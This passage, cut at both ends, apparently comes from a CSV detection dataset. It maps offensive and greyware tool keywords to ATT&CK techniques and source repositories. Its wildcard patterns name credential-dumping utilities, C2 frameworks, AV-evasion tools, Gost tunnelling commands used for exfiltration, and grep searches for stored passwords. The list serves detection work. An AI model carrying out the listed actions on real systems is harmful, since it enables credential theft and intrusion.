TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*goPassGen-master*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" +"*gopherus --exploit mysql*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish-send-mail.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*gorsair -t *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*gosecretsdump -ntds *-system *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gosecure/pyrdp*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*go-shellcode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*goShellCodeByPassVT*","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*goshs -b * --ssl --self-signed -p * -d /workspace*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gost -L=:* -F=*:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=admin:*@localhost:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=forward+ssh://:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=rtcp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=rudp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=ssh://:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=ssu://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gost -L=udp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*gotato -m http*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*gotato -m pipe*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*gotato* -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*gotato* -p 4644*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*Gotato-main.*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*govolution/avet*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*goZulipC2.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*goZulipC2-main*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*gpg --list-keys*","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","4","8","N/A","N/A","N/A","N/A" +"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gppassword.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*gpp-decrypt *","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*gpp-decrypt.py -f groups.xml*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gpp-decrypt.rb*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Gr1mmie/AtlasC2*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*GrantMailboxAccess.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*GrantSamAccessPermission.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*GreatSCT.git*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*GreatSCT.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*Greenwolf*","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.","T2348 - T2349 - T2366 - T2423 - T2597 - T2596","TA0011 - TA0022 - TA0026","N/A","N/A","Information Gathering","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","10","3599","797","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z" +"*gremwell/o365enum*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*grep -* *DBPassword*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep *password /var/www*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep *password.* /etc/*.conf*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep :0: /etc/passwd*","greyware_tool_keyword","grep","Look for users with a UID of 0","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep -i pass *","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -i user *","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://gtfobins.github.io/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -R db_passwd*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -roiE *password*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep*|pwd=|passwd=|password=*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep*password|pwd|pass*","greyware_tool_keyword","grep","search for passwords","T1213 - T1081","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep-through-commits.sh *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Group3r.cs*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*Group3r.exe*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*Group3r/Group3r*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gtfobins*","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068 - T1043 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*GTFOBLookup*","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and 